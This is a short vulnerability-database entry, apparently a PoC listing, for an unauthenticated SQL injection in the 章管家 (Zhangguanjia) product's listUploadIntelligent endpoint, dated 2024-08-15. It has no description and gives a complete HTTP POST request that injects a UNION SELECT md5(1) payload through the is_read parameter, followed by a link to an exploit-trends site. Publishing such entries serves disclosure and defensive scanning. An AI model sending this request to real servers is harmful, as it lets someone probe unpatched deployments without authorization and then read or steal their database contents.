上海建业信息科技 章管家 listUploadIntelligent 未授权 SQL注入漏洞

2024-08-15 章管家 PoC Public

Description

No description available.

PoC

POST /app/message/listUploadIntelligent.htm?token=dingtalk_token HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

person_id=1&unit_id=1&pageNo=1&is_read=-1 union select md5(1),2,3,4,5,6,7,8,9,10,11,12 --

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities